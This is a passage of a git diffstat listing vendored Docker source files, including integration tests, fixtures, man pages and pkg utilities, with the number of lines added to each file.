.../integration-cli/docker_api_info_test.go | 53 + .../docker_api_inspect_test.go | 183 + .../docker_api_inspect_unix_test.go | 35 + .../integration-cli/docker_api_logs_test.go | 87 + .../docker_api_network_test.go | 353 + .../integration-cli/docker_api_resize_test.go | 44 + .../docker_api_service_update_test.go | 39 + .../integration-cli/docker_api_stats_test.go | 310 + .../docker_api_stats_unix_test.go | 41 + .../integration-cli/docker_api_swarm_test.go | 1367 +++ .../docker/integration-cli/docker_api_test.go | 118 + .../docker_api_update_unix_test.go | 35 + .../docker_api_version_test.go | 23 + .../docker_api_volumes_test.go | 89 + .../integration-cli/docker_cli_attach_test.go | 168 + .../docker_cli_attach_unix_test.go | 237 + .../docker_cli_authz_plugin_v2_test.go | 133 + .../docker_cli_authz_unix_test.go | 477 + .../integration-cli/docker_cli_build_test.go | 7392 ++++++++++++++++ .../docker_cli_build_unix_test.go | 207 + .../docker_cli_by_digest_test.go | 693 ++ .../integration-cli/docker_cli_commit_test.go | 157 + .../integration-cli/docker_cli_config_test.go | 140 + .../docker_cli_cp_from_container_test.go | 488 ++ .../integration-cli/docker_cli_cp_test.go | 660 ++ .../docker_cli_cp_to_container_test.go | 599 ++ .../docker_cli_cp_to_container_unix_test.go | 39 + .../integration-cli/docker_cli_cp_utils.go | 303 + .../integration-cli/docker_cli_create_test.go | 513 ++ .../docker_cli_daemon_plugins_test.go | 317 + .../integration-cli/docker_cli_daemon_test.go | 2988 +++++++ .../integration-cli/docker_cli_diff_test.go | 98 + .../integration-cli/docker_cli_events_test.go | 794 ++ .../docker_cli_events_unix_test.go | 486 + .../integration-cli/docker_cli_exec_test.go | 601 ++ .../docker_cli_exec_unix_test.go | 93 + .../docker_cli_experimental_test.go | 36 + .../docker_cli_export_import_test.go | 49 + ...cker_cli_external_graphdriver_unix_test.go | 405 + ...er_cli_external_volume_driver_unix_test.go | 627 ++ .../integration-cli/docker_cli_health_test.go | 169 + 
.../integration-cli/docker_cli_help_test.go | 321 + .../docker_cli_history_test.go | 121 + .../integration-cli/docker_cli_images_test.go | 364 + .../integration-cli/docker_cli_import_test.go | 150 + .../integration-cli/docker_cli_info_test.go | 234 + .../docker_cli_info_unix_test.go | 15 + .../docker_cli_inspect_test.go | 466 + .../integration-cli/docker_cli_kill_test.go | 134 + .../integration-cli/docker_cli_links_test.go | 240 + .../docker_cli_links_unix_test.go | 26 + .../integration-cli/docker_cli_login_test.go | 44 + .../integration-cli/docker_cli_logout_test.go | 100 + .../docker_cli_logs_bench_test.go | 32 + .../integration-cli/docker_cli_logs_test.go | 328 + .../integration-cli/docker_cli_nat_test.go | 93 + .../docker_cli_netmode_test.go | 94 + .../docker_cli_network_unix_test.go | 1791 ++++ .../docker_cli_oom_killed_test.go | 30 + .../integration-cli/docker_cli_pause_test.go | 66 + .../docker_cli_plugins_test.go | 393 + .../integration-cli/docker_cli_port_test.go | 319 + .../integration-cli/docker_cli_proxy_test.go | 53 + .../docker_cli_prune_unix_test.go | 91 + .../integration-cli/docker_cli_ps_test.go | 952 ++ .../docker_cli_pull_local_test.go | 492 ++ .../integration-cli/docker_cli_pull_test.go | 274 + .../docker_cli_pull_trusted_test.go | 365 + .../integration-cli/docker_cli_push_test.go | 715 ++ .../docker_cli_registry_user_agent_test.go | 120 + .../integration-cli/docker_cli_rename_test.go | 138 + .../docker_cli_restart_test.go | 278 + .../integration-cli/docker_cli_rm_test.go | 86 + .../integration-cli/docker_cli_rmi_test.go | 352 + .../integration-cli/docker_cli_run_test.go | 4689 ++++++++++ .../docker_cli_run_unix_test.go | 1592 ++++ .../docker_cli_save_load_test.go | 383 + .../docker_cli_save_load_unix_test.go | 109 + .../integration-cli/docker_cli_search_test.go | 131 + .../docker_cli_secret_create_test.go | 131 + .../docker_cli_secret_inspect_test.go | 68 + .../docker_cli_service_create_test.go | 175 + .../docker_cli_service_health_test.go | 
191 + ...cker_cli_service_logs_experimental_test.go | 96 + .../docker_cli_service_scale_test.go | 57 + .../docker_cli_service_update_test.go | 130 + .../integration-cli/docker_cli_sni_test.go | 44 + .../integration-cli/docker_cli_stack_test.go | 186 + .../integration-cli/docker_cli_start_test.go | 199 + .../integration-cli/docker_cli_stats_test.go | 159 + .../integration-cli/docker_cli_stop_test.go | 17 + .../integration-cli/docker_cli_swarm_test.go | 1254 +++ .../docker_cli_swarm_unix_test.go | 52 + .../integration-cli/docker_cli_tag_test.go | 225 + .../integration-cli/docker_cli_top_test.go | 73 + .../integration-cli/docker_cli_update_test.go | 41 + .../docker_cli_update_unix_test.go | 283 + .../integration-cli/docker_cli_userns_test.go | 98 + .../docker_cli_v2_only_test.go | 125 + .../docker_cli_version_test.go | 58 + .../integration-cli/docker_cli_volume_test.go | 427 + .../integration-cli/docker_cli_wait_test.go | 97 + .../docker_deprecated_api_v124_test.go | 227 + .../docker_deprecated_api_v124_unix_test.go | 30 + .../docker_experimental_network_test.go | 594 ++ .../docker_hub_pull_suite_test.go | 90 + .../integration-cli/docker_test_vars.go | 165 + .../docker/integration-cli/docker_utils.go | 1607 ++++ .../docker/integration-cli/events_utils.go | 206 + .../docker/docker/integration-cli/fixtures.go | 69 + .../auth/docker-credential-shell-test | 55 + .../fixtures/credentialspecs/valid.json | 25 + .../fixtures/deploy/default.yaml | 9 + .../fixtures/deploy/remove.yaml | 11 + .../fixtures/deploy/secrets.yaml | 20 + .../integration-cli/fixtures/https/ca.pem | 23 + .../fixtures/https/client-cert.pem | 73 + .../fixtures/https/client-key.pem | 16 + .../fixtures/https/client-rogue-cert.pem | 73 + .../fixtures/https/client-rogue-key.pem | 16 + .../fixtures/https/server-cert.pem | 76 + .../fixtures/https/server-key.pem | 16 + .../fixtures/https/server-rogue-cert.pem | 76 + .../fixtures/https/server-rogue-key.pem | 16 + .../fixtures/load/emptyLayer.tar | Bin 0 -> 30720 
bytes .../integration-cli/fixtures/load/frozen.go | 182 + .../fixtures/notary/delgkey1.crt | 21 + .../fixtures/notary/delgkey1.key | 27 + .../fixtures/notary/delgkey2.crt | 21 + .../fixtures/notary/delgkey2.key | 27 + .../fixtures/notary/delgkey3.crt | 21 + .../fixtures/notary/delgkey3.key | 27 + .../fixtures/notary/delgkey4.crt | 21 + .../fixtures/notary/delgkey4.key | 27 + .../integration-cli/fixtures/notary/gen.sh | 18 + .../fixtures/notary/localhost.cert | 19 + .../fixtures/notary/localhost.key | 27 + .../fixtures/registry/cert.pem | 21 + .../integration-cli/fixtures/secrets/default | 1 + .../integration-cli/fixtures_linux_daemon.go | 143 + .../docker/docker/integration-cli/npipe.go | 12 + .../docker/integration-cli/npipe_windows.go | 12 + .../docker/docker/integration-cli/registry.go | 177 + .../docker/integration-cli/registry_mock.go | 55 + .../docker/integration-cli/requirements.go | 243 + .../integration-cli/requirements_unix.go | 159 + .../docker/integration-cli/test_vars.go | 11 + .../docker/integration-cli/test_vars_exec.go | 8 + .../integration-cli/test_vars_noexec.go | 8 + .../integration-cli/test_vars_noseccomp.go | 8 + .../integration-cli/test_vars_seccomp.go | 8 + .../docker/integration-cli/test_vars_unix.go | 14 + .../integration-cli/test_vars_windows.go | 15 + .../docker/integration-cli/trust_server.go | 344 + .../docker/docker/integration-cli/utils.go | 79 + .../github.com/docker/docker/layer/empty.go | 56 + .../docker/docker/layer/empty_test.go | 46 + .../docker/docker/layer/filestore.go | 354 + .../docker/docker/layer/filestore_test.go | 104 + .../github.com/docker/docker/layer/layer.go | 275 + .../docker/docker/layer/layer_store.go | 684 ++ .../docker/layer/layer_store_windows.go | 11 + .../docker/docker/layer/layer_test.go | 771 ++ .../docker/docker/layer/layer_unix.go | 9 + .../docker/docker/layer/layer_unix_test.go | 71 + .../docker/docker/layer/layer_windows.go | 98 + .../docker/docker/layer/migration.go | 256 + 
.../docker/docker/layer/migration_test.go | 435 + .../docker/docker/layer/mount_test.go | 230 + .../docker/docker/layer/mounted_layer.go | 99 + .../docker/docker/layer/ro_layer.go | 192 + .../docker/docker/layer/ro_layer_windows.go | 9 + .../docker/docker/libcontainerd/client.go | 46 + .../docker/libcontainerd/client_linux.go | 605 ++ .../docker/libcontainerd/client_solaris.go | 101 + .../docker/libcontainerd/client_unix.go | 142 + .../docker/libcontainerd/client_windows.go | 631 ++ .../docker/docker/libcontainerd/container.go | 13 + .../docker/libcontainerd/container_unix.go | 250 + .../docker/libcontainerd/container_windows.go | 311 + .../docker/docker/libcontainerd/oom_linux.go | 31 + .../docker/libcontainerd/oom_solaris.go | 5 + .../docker/libcontainerd/pausemonitor_unix.go | 42 + .../docker/docker/libcontainerd/process.go | 18 + .../docker/libcontainerd/process_unix.go | 107 + .../docker/libcontainerd/process_windows.go | 51 + .../docker/docker/libcontainerd/queue_unix.go | 31 + .../docker/docker/libcontainerd/remote.go | 20 + .../docker/libcontainerd/remote_unix.go | 544 ++ .../docker/libcontainerd/remote_windows.go | 36 + .../docker/docker/libcontainerd/types.go | 75 + .../docker/libcontainerd/types_linux.go | 49 + .../docker/libcontainerd/types_solaris.go | 43 + .../docker/libcontainerd/types_windows.go | 79 + .../docker/libcontainerd/utils_linux.go | 62 + .../docker/libcontainerd/utils_solaris.go | 27 + .../docker/libcontainerd/utils_windows.go | 46 + .../libcontainerd/utils_windows_test.go | 13 + .../github.com/docker/docker/man/Dockerfile | 24 + .../docker/docker/man/Dockerfile.5.md | 474 + .../docker/docker/man/Dockerfile.aarch64 | 25 + .../docker/docker/man/Dockerfile.armhf | 43 + .../docker/docker/man/Dockerfile.ppc64le | 35 + .../docker/docker/man/Dockerfile.s390x | 35 + vendor/github.com/docker/docker/man/README.md | 15 + .../docker/docker/man/docker-attach.1.md | 99 + .../docker/docker/man/docker-build.1.md | 340 + 
.../docker/docker/man/docker-commit.1.md | 71 + .../docker/docker/man/docker-config-json.5.md | 72 + .../docker/docker/man/docker-cp.1.md | 175 + .../docker/docker/man/docker-create.1.md | 553 ++ .../docker/docker/man/docker-diff.1.md | 49 + .../docker/docker/man/docker-events.1.md | 180 + .../docker/docker/man/docker-exec.1.md | 71 + .../docker/docker/man/docker-export.1.md | 46 + .../docker/docker/man/docker-history.1.md | 52 + .../docker/docker/man/docker-images.1.md | 153 + .../docker/docker/man/docker-import.1.md | 72 + .../docker/docker/man/docker-info.1.md | 187 + .../docker/docker/man/docker-inspect.1.md | 323 + .../docker/docker/man/docker-kill.1.md | 28 + .../docker/docker/man/docker-load.1.md | 56 + .../docker/docker/man/docker-login.1.md | 53 + .../docker/docker/man/docker-logout.1.md | 32 + .../docker/docker/man/docker-logs.1.md | 71 + .../docker/man/docker-network-connect.1.md | 66 + .../docker/man/docker-network-create.1.md | 187 + .../docker/man/docker-network-disconnect.1.md | 36 + .../docker/man/docker-network-inspect.1.md | 112 + .../docker/docker/man/docker-network-ls.1.md | 188 + .../docker/docker/man/docker-network-rm.1.md | 43 + .../docker/docker/man/docker-pause.1.md | 32 + .../docker/docker/man/docker-port.1.md | 47 + .../docker/docker/man/docker-ps.1.md | 145 + .../docker/docker/man/docker-pull.1.md | 220 + .../docker/docker/man/docker-push.1.md | 63 + .../docker/docker/man/docker-rename.1.md | 15 + .../docker/docker/man/docker-restart.1.md | 26 + .../docker/docker/man/docker-rm.1.md | 72 + .../docker/docker/man/docker-rmi.1.md | 42 + .../docker/docker/man/docker-run.1.md | 1055 +++ .../docker/docker/man/docker-save.1.md | 45 + .../docker/docker/man/docker-search.1.md | 70 + .../docker/docker/man/docker-start.1.md | 39 + .../docker/docker/man/docker-stats.1.md | 57 + .../docker/docker/man/docker-stop.1.md | 30 + .../docker/docker/man/docker-tag.1.md | 76 + .../docker/docker/man/docker-top.1.md | 36 + 
.../docker/docker/man/docker-unpause.1.md | 28 + .../docker/docker/man/docker-update.1.md | 171 + .../docker/docker/man/docker-version.1.md | 62 + .../docker/docker/man/docker-wait.1.md | 30 + .../github.com/docker/docker/man/docker.1.md | 237 + .../github.com/docker/docker/man/dockerd.8.md | 710 ++ .../github.com/docker/docker/man/generate.go | 43 + .../github.com/docker/docker/man/generate.sh | 15 + .../github.com/docker/docker/man/glide.lock | 52 + .../github.com/docker/docker/man/glide.yaml | 12 + .../docker/docker/man/md2man-all.sh | 22 + .../docker/docker/migrate/v1/migratev1.go | 504 ++ .../docker/migrate/v1/migratev1_test.go | 438 + .../docker/docker/oci/defaults_linux.go | 168 + .../docker/docker/oci/defaults_solaris.go | 20 + .../docker/docker/oci/defaults_windows.go | 19 + .../docker/docker/oci/devices_linux.go | 86 + .../docker/docker/oci/devices_unsupported.go | 20 + .../docker/docker/oci/namespaces.go | 16 + vendor/github.com/docker/docker/opts/hosts.go | 151 + .../docker/docker/opts/hosts_test.go | 148 + .../docker/docker/opts/hosts_unix.go | 8 + .../docker/docker/opts/hosts_windows.go | 6 + vendor/github.com/docker/docker/opts/ip.go | 47 + .../github.com/docker/docker/opts/ip_test.go | 54 + vendor/github.com/docker/docker/opts/mount.go | 171 + .../docker/docker/opts/mount_test.go | 184 + vendor/github.com/docker/docker/opts/opts.go | 360 + .../docker/docker/opts/opts_test.go | 232 + .../docker/docker/opts/opts_unix.go | 6 + .../docker/docker/opts/opts_windows.go | 56 + vendor/github.com/docker/docker/opts/port.go | 146 + .../docker/docker/opts/port_test.go | 259 + .../docker/docker/opts/quotedstring.go | 37 + .../docker/docker/opts/quotedstring_test.go | 28 + .../github.com/docker/docker/opts/secret.go | 107 + .../docker/docker/opts/secret_test.go | 79 + vendor/github.com/docker/docker/pkg/README.md | 11 + .../docker/docker/pkg/aaparser/aaparser.go | 91 + .../docker/pkg/aaparser/aaparser_test.go | 73 + .../docker/docker/pkg/archive/README.md | 1 + 
.../docker/docker/pkg/archive/archive.go | 1175 +++ .../docker/pkg/archive/archive_linux.go | 95 + .../docker/pkg/archive/archive_linux_test.go | 187 + .../docker/pkg/archive/archive_other.go | 7 + .../docker/docker/pkg/archive/archive_test.go | 1162 +++ .../docker/docker/pkg/archive/archive_unix.go | 118 + .../docker/pkg/archive/archive_unix_test.go | 249 + .../docker/pkg/archive/archive_windows.go | 70 + .../pkg/archive/archive_windows_test.go | 91 + .../docker/docker/pkg/archive/changes.go | 446 + .../docker/pkg/archive/changes_linux.go | 312 + .../docker/pkg/archive/changes_other.go | 97 + .../docker/pkg/archive/changes_posix_test.go | 132 + .../docker/docker/pkg/archive/changes_test.go | 572 ++ .../docker/docker/pkg/archive/changes_unix.go | 36 + .../docker/pkg/archive/changes_windows.go | 30 + .../docker/docker/pkg/archive/copy.go | 458 + .../docker/docker/pkg/archive/copy_unix.go | 11 + .../docker/pkg/archive/copy_unix_test.go | 978 +++ .../docker/docker/pkg/archive/copy_windows.go | 9 + .../docker/docker/pkg/archive/diff.go | 279 + .../docker/docker/pkg/archive/diff_test.go | 386 + .../docker/pkg/archive/example_changes.go | 97 + .../docker/pkg/archive/testdata/broken.tar | Bin 0 -> 13824 bytes .../docker/docker/pkg/archive/time_linux.go | 16 + .../docker/pkg/archive/time_unsupported.go | 16 + .../docker/docker/pkg/archive/utils_test.go | 166 + .../docker/docker/pkg/archive/whiteouts.go | 23 + .../docker/docker/pkg/archive/wrap.go | 59 + .../docker/docker/pkg/archive/wrap_test.go | 98 + .../docker/docker/pkg/authorization/api.go | 88 + .../docker/docker/pkg/authorization/authz.go | 186 + .../pkg/authorization/authz_unix_test.go | 282 + .../docker/pkg/authorization/middleware.go | 84 + .../docker/docker/pkg/authorization/plugin.go | 112 + .../docker/pkg/authorization/response.go | 203 + .../docker/pkg/broadcaster/unbuffered.go | 49 + .../docker/pkg/broadcaster/unbuffered_test.go | 162 + .../docker/pkg/chrootarchive/archive.go | 97 + 
.../docker/pkg/chrootarchive/archive_test.go | 394 + .../docker/pkg/chrootarchive/archive_unix.go | 86 + .../pkg/chrootarchive/archive_windows.go | 22 + .../docker/pkg/chrootarchive/chroot_linux.go | 108 + .../docker/pkg/chrootarchive/chroot_unix.go | 12 + .../docker/docker/pkg/chrootarchive/diff.go | 23 + .../docker/pkg/chrootarchive/diff_unix.go | 130 + .../docker/pkg/chrootarchive/diff_windows.go | 45 + .../docker/pkg/chrootarchive/init_unix.go | 28 + .../docker/pkg/chrootarchive/init_windows.go | 4 + .../docker/pkg/devicemapper/devmapper.go | 828 ++ .../docker/pkg/devicemapper/devmapper_log.go | 35 + .../pkg/devicemapper/devmapper_wrapper.go | 251 + .../devmapper_wrapper_deferred_remove.go | 34 + .../devmapper_wrapper_no_deferred_remove.go | 15 + .../docker/docker/pkg/devicemapper/ioctl.go | 27 + .../docker/docker/pkg/devicemapper/log.go | 11 + .../docker/docker/pkg/directory/directory.go | 26 + .../docker/pkg/directory/directory_test.go | 192 + .../docker/pkg/directory/directory_unix.go | 48 + .../docker/pkg/directory/directory_windows.go | 37 + .../docker/docker/pkg/discovery/README.md | 41 + .../docker/docker/pkg/discovery/backends.go | 107 + .../docker/docker/pkg/discovery/discovery.go | 35 + .../docker/pkg/discovery/discovery_test.go | 137 + .../docker/docker/pkg/discovery/entry.go | 94 + .../docker/docker/pkg/discovery/file/file.go | 107 + .../docker/pkg/discovery/file/file_test.go | 114 + .../docker/docker/pkg/discovery/generator.go | 35 + .../docker/pkg/discovery/generator_test.go | 53 + .../docker/docker/pkg/discovery/kv/kv.go | 192 + .../docker/docker/pkg/discovery/kv/kv_test.go | 324 + .../docker/pkg/discovery/memory/memory.go | 93 + .../pkg/discovery/memory/memory_test.go | 48 + .../docker/pkg/discovery/nodes/nodes.go | 54 + .../docker/pkg/discovery/nodes/nodes_test.go | 51 + .../docker/pkg/filenotify/filenotify.go | 40 + .../docker/docker/pkg/filenotify/fsnotify.go | 18 + .../docker/docker/pkg/filenotify/poller.go | 204 + 
.../docker/pkg/filenotify/poller_test.go | 119 + .../docker/docker/pkg/fileutils/fileutils.go | 283 + .../docker/pkg/fileutils/fileutils_darwin.go | 27 + .../docker/pkg/fileutils/fileutils_solaris.go | 7 + .../docker/pkg/fileutils/fileutils_test.go | 585 ++ .../docker/pkg/fileutils/fileutils_unix.go | 22 + .../docker/pkg/fileutils/fileutils_windows.go | 7 + .../docker/pkg/fsutils/fsutils_linux.go | 89 + .../docker/pkg/fsutils/fsutils_linux_test.go | 91 + .../docker/docker/pkg/gitutils/gitutils.go | 100 + .../docker/pkg/gitutils/gitutils_test.go | 220 + .../docker/pkg/graphdb/conn_sqlite3_linux.go | 19 + .../docker/pkg/graphdb/graphdb_linux.go | 551 ++ .../docker/pkg/graphdb/graphdb_linux_test.go | 721 ++ .../docker/docker/pkg/graphdb/sort_linux.go | 27 + .../docker/pkg/graphdb/sort_linux_test.go | 29 + .../docker/docker/pkg/graphdb/unsupported.go | 3 + .../docker/docker/pkg/graphdb/utils_linux.go | 32 + .../docker/docker/pkg/homedir/homedir.go | 39 + .../docker/docker/pkg/homedir/homedir_test.go | 24 + .../docker/docker/pkg/httputils/httputils.go | 56 + .../docker/pkg/httputils/httputils_test.go | 115 + .../docker/docker/pkg/httputils/mimetype.go | 30 + .../docker/pkg/httputils/mimetype_test.go | 13 + .../pkg/httputils/resumablerequestreader.go | 95 + .../httputils/resumablerequestreader_test.go | 307 + .../docker/docker/pkg/idtools/idtools.go | 197 + .../docker/docker/pkg/idtools/idtools_unix.go | 207 + .../docker/pkg/idtools/idtools_unix_test.go | 271 + .../docker/pkg/idtools/idtools_windows.go | 25 + .../docker/pkg/idtools/usergroupadd_linux.go | 164 + .../pkg/idtools/usergroupadd_unsupported.go | 12 + .../docker/docker/pkg/idtools/utils_unix.go | 32 + .../docker/pkg/integration/checker/checker.go | 46 + .../docker/pkg/integration/cmd/command.go | 294 + .../pkg/integration/cmd/command_test.go | 118 + .../docker/docker/pkg/integration/utils.go | 227 + .../docker/pkg/integration/utils_test.go | 363 + .../docker/docker/pkg/ioutils/buffer.go | 51 + 
.../docker/docker/pkg/ioutils/buffer_test.go | 75 + .../docker/docker/pkg/ioutils/bytespipe.go | 186 + .../docker/pkg/ioutils/bytespipe_test.go | 159 + .../docker/docker/pkg/ioutils/fmt.go | 22 + .../docker/docker/pkg/ioutils/fmt_test.go | 17 + .../docker/docker/pkg/ioutils/fswriters.go | 162 + .../docker/pkg/ioutils/fswriters_test.go | 132 + .../docker/docker/pkg/ioutils/multireader.go | 223 + .../docker/pkg/ioutils/multireader_test.go | 211 + .../docker/docker/pkg/ioutils/readers.go | 154 + .../docker/docker/pkg/ioutils/readers_test.go | 94 + .../docker/docker/pkg/ioutils/temp_unix.go | 10 + .../docker/docker/pkg/ioutils/temp_windows.go | 18 + .../docker/docker/pkg/ioutils/writeflusher.go | 92 + .../docker/docker/pkg/ioutils/writers.go | 66 + .../docker/docker/pkg/ioutils/writers_test.go | 65 + .../docker/docker/pkg/jsonlog/jsonlog.go | 42 + .../docker/pkg/jsonlog/jsonlog_marshalling.go | 178 + .../pkg/jsonlog/jsonlog_marshalling_test.go | 34 + .../docker/docker/pkg/jsonlog/jsonlogbytes.go | 122 + .../docker/pkg/jsonlog/jsonlogbytes_test.go | 39 + .../docker/pkg/jsonlog/time_marshalling.go | 27 + .../pkg/jsonlog/time_marshalling_test.go | 47 + .../docker/pkg/jsonmessage/jsonmessage.go | 225 + .../pkg/jsonmessage/jsonmessage_test.go | 245 + .../docker/pkg/listeners/listeners_solaris.go | 31 + .../docker/pkg/listeners/listeners_unix.go | 94 + .../docker/pkg/listeners/listeners_windows.go | 54 + .../docker/docker/pkg/locker/README.md | 65 + .../docker/docker/pkg/locker/locker.go | 112 + .../docker/docker/pkg/locker/locker_test.go | 124 + .../docker/docker/pkg/longpath/longpath.go | 26 + .../docker/pkg/longpath/longpath_test.go | 22 + .../docker/pkg/loopback/attach_loopback.go | 137 + .../docker/docker/pkg/loopback/ioctl.go | 53 + .../docker/pkg/loopback/loop_wrapper.go | 52 + .../docker/docker/pkg/loopback/loopback.go | 63 + .../docker/docker/pkg/mount/flags.go | 149 + .../docker/docker/pkg/mount/flags_freebsd.go | 48 + .../docker/docker/pkg/mount/flags_linux.go | 
85 + .../docker/pkg/mount/flags_unsupported.go | 30 + .../docker/docker/pkg/mount/mount.go | 74 + .../docker/pkg/mount/mount_unix_test.go | 162 + .../docker/pkg/mount/mounter_freebsd.go | 59 + .../docker/docker/pkg/mount/mounter_linux.go | 21 + .../docker/pkg/mount/mounter_solaris.go | 33 + .../docker/pkg/mount/mounter_unsupported.go | 11 + .../docker/docker/pkg/mount/mountinfo.go | 40 + .../docker/pkg/mount/mountinfo_freebsd.go | 41 + .../docker/pkg/mount/mountinfo_linux.go | 95 + .../docker/pkg/mount/mountinfo_linux_test.go | 476 + .../docker/pkg/mount/mountinfo_solaris.go | 37 + .../docker/pkg/mount/mountinfo_unsupported.go | 12 + .../docker/pkg/mount/mountinfo_windows.go | 6 + .../docker/pkg/mount/sharedsubtree_linux.go | 69 + .../pkg/mount/sharedsubtree_linux_test.go | 331 + .../docker/pkg/mount/sharedsubtree_solaris.go | 58 + .../cmd/names-generator/main.go | 11 + .../pkg/namesgenerator/names-generator.go | 590 ++ .../namesgenerator/names-generator_test.go | 27 + .../docker/pkg/parsers/kernel/kernel.go | 74 + .../pkg/parsers/kernel/kernel_darwin.go | 56 + .../docker/pkg/parsers/kernel/kernel_unix.go | 45 + .../pkg/parsers/kernel/kernel_unix_test.go | 96 + .../pkg/parsers/kernel/kernel_windows.go | 69 + .../docker/pkg/parsers/kernel/uname_linux.go | 19 + .../pkg/parsers/kernel/uname_solaris.go | 14 + .../pkg/parsers/kernel/uname_unsupported.go | 18 + .../operatingsystem/operatingsystem_linux.go | 77 + .../operatingsystem_solaris.go | 37 + .../operatingsystem/operatingsystem_unix.go | 25 + .../operatingsystem_unix_test.go | 247 + .../operatingsystem_windows.go | 49 + .../docker/docker/pkg/parsers/parsers.go | 69 + .../docker/docker/pkg/parsers/parsers_test.go | 70 + .../docker/docker/pkg/pidfile/pidfile.go | 56 + .../docker/pkg/pidfile/pidfile_darwin.go | 18 + .../docker/docker/pkg/pidfile/pidfile_test.go | 38 + .../docker/docker/pkg/pidfile/pidfile_unix.go | 16 + .../docker/pkg/pidfile/pidfile_windows.go | 23 + .../docker/pkg/platform/architecture_linux.go | 
16 + .../docker/pkg/platform/architecture_unix.go | 20 + .../pkg/platform/architecture_windows.go | 60 + .../docker/docker/pkg/platform/platform.go | 23 + .../docker/pkg/platform/utsname_int8.go | 18 + .../docker/pkg/platform/utsname_uint8.go | 18 + .../docker/docker/pkg/plugingetter/getter.go | 35 + .../docker/docker/pkg/plugins/client.go | 205 + .../docker/docker/pkg/plugins/client_test.go | 134 + .../docker/docker/pkg/plugins/discovery.go | 131 + .../docker/pkg/plugins/discovery_test.go | 152 + .../docker/pkg/plugins/discovery_unix.go | 5 + .../docker/pkg/plugins/discovery_unix_test.go | 61 + .../docker/pkg/plugins/discovery_windows.go | 8 + .../docker/docker/pkg/plugins/errors.go | 33 + .../docker/docker/pkg/plugins/plugin_test.go | 44 + .../pkg/plugins/pluginrpc-gen/README.md | 58 + .../pkg/plugins/pluginrpc-gen/fixtures/foo.go | 89 + .../fixtures/otherfixture/spaceship.go | 4 + .../docker/pkg/plugins/pluginrpc-gen/main.go | 91 + .../pkg/plugins/pluginrpc-gen/parser.go | 263 + .../pkg/plugins/pluginrpc-gen/parser_test.go | 222 + .../pkg/plugins/pluginrpc-gen/template.go | 118 + .../docker/docker/pkg/plugins/plugins.go | 329 + .../docker/pkg/plugins/plugins_linux.go | 7 + .../docker/pkg/plugins/plugins_windows.go | 8 + .../docker/pkg/plugins/transport/http.go | 36 + .../docker/pkg/plugins/transport/transport.go | 36 + .../docker/docker/pkg/pools/pools.go | 116 + .../docker/docker/pkg/pools/pools_test.go | 161 + .../docker/docker/pkg/progress/progress.go | 84 + .../docker/pkg/progress/progressreader.go | 66 + .../pkg/progress/progressreader_test.go | 75 + .../docker/docker/pkg/promise/promise.go | 11 + .../docker/docker/pkg/pubsub/publisher.go | 111 + .../docker/pkg/pubsub/publisher_test.go | 142 + .../docker/docker/pkg/random/random.go | 71 + .../docker/docker/pkg/random/random_test.go | 22 + .../docker/docker/pkg/reexec/README.md | 5 + .../docker/docker/pkg/reexec/command_linux.go | 28 + .../docker/docker/pkg/reexec/command_unix.go | 23 + 
.../docker/pkg/reexec/command_unsupported.go | 12 + .../docker/pkg/reexec/command_windows.go | 23 + .../docker/docker/pkg/reexec/reexec.go | 47 + .../docker/docker/pkg/registrar/registrar.go | 127 + .../docker/pkg/registrar/registrar_test.go | 119 + .../docker/docker/pkg/signal/README.md | 1 + .../docker/docker/pkg/signal/signal.go | 54 + .../docker/docker/pkg/signal/signal_darwin.go | 41 + .../docker/pkg/signal/signal_freebsd.go | 43 + .../docker/docker/pkg/signal/signal_linux.go | 80 + .../docker/pkg/signal/signal_solaris.go | 42 + .../docker/docker/pkg/signal/signal_unix.go | 21 + .../docker/pkg/signal/signal_unsupported.go | 10 + .../docker/pkg/signal/signal_windows.go | 28 + .../docker/docker/pkg/signal/trap.go | 103 + .../docker/docker/pkg/stdcopy/stdcopy.go | 174 + .../docker/docker/pkg/stdcopy/stdcopy_test.go | 260 + .../pkg/streamformatter/streamformatter.go | 172 + .../streamformatter/streamformatter_test.go | 108 + .../docker/docker/pkg/stringid/README.md | 1 + .../docker/docker/pkg/stringid/stringid.go | 69 + .../docker/pkg/stringid/stringid_test.go | 72 + .../docker/docker/pkg/stringutils/README.md | 1 + .../docker/pkg/stringutils/stringutils.go | 101 + .../pkg/stringutils/stringutils_test.go | 121 + .../docker/docker/pkg/symlink/LICENSE.APACHE | 191 + .../docker/docker/pkg/symlink/LICENSE.BSD | 27 + .../docker/docker/pkg/symlink/README.md | 6 + .../docker/docker/pkg/symlink/fs.go | 144 + .../docker/docker/pkg/symlink/fs_unix.go | 15 + .../docker/docker/pkg/symlink/fs_unix_test.go | 407 + .../docker/docker/pkg/symlink/fs_windows.go | 169 + .../docker/docker/pkg/sysinfo/README.md | 1 + .../docker/docker/pkg/sysinfo/numcpu.go | 12 + .../docker/docker/pkg/sysinfo/numcpu_linux.go | 43 + .../docker/pkg/sysinfo/numcpu_windows.go | 37 + .../docker/docker/pkg/sysinfo/sysinfo.go | 144 + .../docker/pkg/sysinfo/sysinfo_linux.go | 259 + .../docker/pkg/sysinfo/sysinfo_linux_test.go | 58 + .../docker/pkg/sysinfo/sysinfo_solaris.go | 121 + 
.../docker/docker/pkg/sysinfo/sysinfo_test.go | 26 + .../docker/docker/pkg/sysinfo/sysinfo_unix.go | 9 + .../docker/pkg/sysinfo/sysinfo_windows.go | 9 + .../docker/docker/pkg/system/chtimes.go | 52 + .../docker/docker/pkg/system/chtimes_test.go | 94 + .../docker/docker/pkg/system/chtimes_unix.go | 14 + .../docker/pkg/system/chtimes_unix_test.go | 91 + .../docker/pkg/system/chtimes_windows.go | 27 + .../docker/pkg/system/chtimes_windows_test.go | 86 + .../docker/docker/pkg/system/errors.go | 10 + .../docker/pkg/system/events_windows.go | 85 + .../docker/docker/pkg/system/exitcode.go | 33 + .../docker/docker/pkg/system/filesys.go | 54 + .../docker/pkg/system/filesys_windows.go | 236 + .../docker/docker/pkg/system/lstat.go | 19 + .../docker/pkg/system/lstat_unix_test.go | 30 + .../docker/docker/pkg/system/lstat_windows.go | 25 + .../docker/docker/pkg/system/meminfo.go | 17 + .../docker/docker/pkg/system/meminfo_linux.go | 65 + .../docker/pkg/system/meminfo_solaris.go | 128 + .../docker/pkg/system/meminfo_unix_test.go | 40 + .../docker/pkg/system/meminfo_unsupported.go | 8 + .../docker/pkg/system/meminfo_windows.go | 45 + .../docker/docker/pkg/system/mknod.go | 22 + .../docker/docker/pkg/system/mknod_windows.go | 13 + .../docker/docker/pkg/system/path_unix.go | 14 + .../docker/docker/pkg/system/path_windows.go | 37 + .../docker/pkg/system/path_windows_test.go | 